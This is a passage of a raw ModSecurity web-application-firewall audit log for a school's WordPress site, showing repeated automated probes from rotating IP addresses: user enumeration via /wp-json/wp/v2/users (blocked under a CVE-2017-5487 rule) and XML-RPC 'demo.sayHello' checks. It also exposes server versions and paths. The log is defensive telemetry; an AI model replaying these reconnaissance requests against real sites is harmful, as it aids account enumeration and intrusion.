--d9e2a730-Z-- --076fdf11-A-- [17/May/2025:02:54:18 +0700] aCeX6thEtho3ciA0weheLQAAAIQ 103.236.140.4 54450 103.236.140.4 8181 --076fdf11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --076fdf11-C-- demo.sayHello --076fdf11-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --076fdf11-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425258391383 5643 (- - -) Stopwatch2: 1747425258391383 5643; combined=4223, p1=527, p2=3482, p3=28, p4=31, p5=91, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --076fdf11-Z-- --adbd6c25-A-- [17/May/2025:02:55:42 +0700] aCeYPkE0LfP59mkCzg42AAAAAMI 103.236.140.4 54466 103.236.140.4 8181 --adbd6c25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --adbd6c25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adbd6c25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425342652511 3330 (- - -) Stopwatch2: 1747425342652511 3330; combined=1453, p1=480, p2=940, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adbd6c25-Z-- --d55a8215-A-- [17/May/2025:02:55:48 +0700] aCeYRNhEtho3ciA0weheNAAAAIw 103.236.140.4 54470 103.236.140.4 8181 --d55a8215-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.91.124 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.91.124 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d55a8215-C-- demo.sayHello --d55a8215-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d55a8215-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425348637759 4521 (- - -) Stopwatch2: 1747425348637759 4521; combined=3588, p1=419, p2=2974, p3=21, p4=24, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d55a8215-Z-- --942dd219-A-- [17/May/2025:02:56:55 +0700] aCeYh9hEtho3ciA0weheNQAAAJU 103.236.140.4 54476 103.236.140.4 8181 --942dd219-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --942dd219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --942dd219-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425415590045 2594 (- - -) Stopwatch2: 1747425415590045 2594; combined=1165, p1=420, p2=716, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --942dd219-Z-- --bbd6052b-A-- [17/May/2025:02:57:03 +0700] aCeYj9e6THFz1hsaJaLZNAAAAAY 103.236.140.4 54480 103.236.140.4 8181 --bbd6052b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.103 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bbd6052b-C-- demo.sayHello --bbd6052b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbd6052b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425423371397 6482 (- - -) Stopwatch2: 1747425423371397 6482; combined=4556, p1=578, p2=3657, p3=43, p4=41, p5=133, sr=69, sw=104, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbd6052b-Z-- --ebe25825-A-- [17/May/2025:03:00:17 +0700] aCeZUdhEtho3ciA0weheOwAAAIM 103.236.140.4 54502 103.236.140.4 8181 --ebe25825-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ebe25825-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebe25825-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425617323627 2919 (- - -) Stopwatch2: 1747425617323627 2919; combined=1345, p1=433, p2=880, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebe25825-Z-- --9a930b67-A-- [17/May/2025:03:00:26 +0700] aCeZWte6THFz1hsaJaLZOAAAAAw 103.236.140.4 54506 103.236.140.4 8181 --9a930b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.140 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.140 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a930b67-C-- demo.sayHello --9a930b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a930b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425626793158 6555 (- - -) Stopwatch2: 1747425626793158 6555; combined=4712, p1=598, p2=3870, p3=37, p4=41, p5=100, sr=79, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a930b67-Z-- --cb63f372-A-- [17/May/2025:03:04:02 +0700] aCeaMthEtho3ciA0weheQQAAAIg 103.236.140.4 54526 103.236.140.4 8181 --cb63f372-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cb63f372-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb63f372-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425842921358 2846 (- - -) Stopwatch2: 1747425842921358 2846; combined=1279, p1=422, p2=828, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb63f372-Z-- --36af9b39-A-- [17/May/2025:03:04:08 +0700] aCeaONhEtho3ciA0weheQwAAAI8 103.236.140.4 54530 103.236.140.4 8181 --36af9b39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.76.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.76.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36af9b39-C-- demo.sayHello --36af9b39-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36af9b39-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425848271806 5321 (- - -) Stopwatch2: 1747425848271806 5321; combined=4048, p1=515, p2=3313, p3=30, p4=33, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36af9b39-Z-- --f126e33e-A-- [17/May/2025:03:05:05 +0700] aCeacdhEtho3ciA0weheRQAAAJU 103.236.140.4 54536 103.236.140.4 8181 --f126e33e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f126e33e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f126e33e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425905489364 3298 (- - -) Stopwatch2: 1747425905489364 3298; combined=1359, p1=477, p2=850, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f126e33e-Z-- --7a0d8b03-A-- [17/May/2025:03:05:09 +0700] aCeadde6THFz1hsaJaLZOgAAABM 103.236.140.4 54540 103.236.140.4 8181 --7a0d8b03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a0d8b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0d8b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425909606259 2151 (- - -) Stopwatch2: 1747425909606259 2151; combined=973, p1=319, p2=628, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0d8b03-Z-- --130a0d03-A-- [17/May/2025:03:05:13 +0700] aCeaedhEtho3ciA0weheRwAAAI0 103.236.140.4 54542 103.236.140.4 8181 --130a0d03-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.22 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --130a0d03-C-- demo.sayHello --130a0d03-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --130a0d03-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425913551139 6246 (- - -) Stopwatch2: 1747425913551139 6246; combined=4574, p1=560, p2=3775, p3=37, p4=36, p5=97, sr=77, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --130a0d03-Z-- --aeee4c4b-A-- [17/May/2025:03:05:15 +0700] aCeae9hEtho3ciA0weheSQAAAJY 103.236.140.4 54548 103.236.140.4 8181 --aeee4c4b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.76.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.76.39 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --aeee4c4b-C-- demo.sayHello --aeee4c4b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --aeee4c4b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425915819489 4796 (- - -) Stopwatch2: 1747425915819489 4796; combined=3704, p1=414, p2=3088, p3=21, p4=24, p5=91, sr=64, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aeee4c4b-Z-- --f24d2414-A-- [17/May/2025:03:05:20 +0700] aCeagNhEtho3ciA0weheSgAAAJg 103.236.140.4 54552 103.236.140.4 8181 --f24d2414-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f24d2414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24d2414-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425920924311 2625 (- - -) Stopwatch2: 1747425920924311 2625; combined=1077, p1=358, p2=695, p3=0, p4=0, p5=24, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24d2414-Z-- --867bf62d-A-- [17/May/2025:03:05:24 +0700] aCeahNhEtho3ciA0weheTAAAAIM 103.236.140.4 54556 103.236.140.4 8181 --867bf62d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.30 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --867bf62d-C-- demo.sayHello --867bf62d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --867bf62d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425924248262 4440 (- - -) Stopwatch2: 1747425924248262 4440; combined=3497, p1=428, p2=2861, p3=33, p4=25, p5=89, sr=65, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --867bf62d-Z-- --cc8a637d-A-- [17/May/2025:03:05:29 +0700] aCeaide6THFz1hsaJaLZPQAAAAE 103.236.140.4 54560 103.236.140.4 8181 --cc8a637d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cc8a637d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc8a637d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425929179497 15351 (- - -) Stopwatch2: 1747425929179497 15351; combined=27690, p1=329, p2=601, p3=0, p4=0, p5=13393, sr=69, sw=0, l=0, gc=13367 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc8a637d-Z-- --83dcf14f-A-- [17/May/2025:03:05:34 +0700] aCeajthEtho3ciA0weheTwAAAIk 103.236.140.4 54564 103.236.140.4 8181 --83dcf14f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --83dcf14f-C-- demo.sayHello --83dcf14f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --83dcf14f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425934861432 4789 (- - -) Stopwatch2: 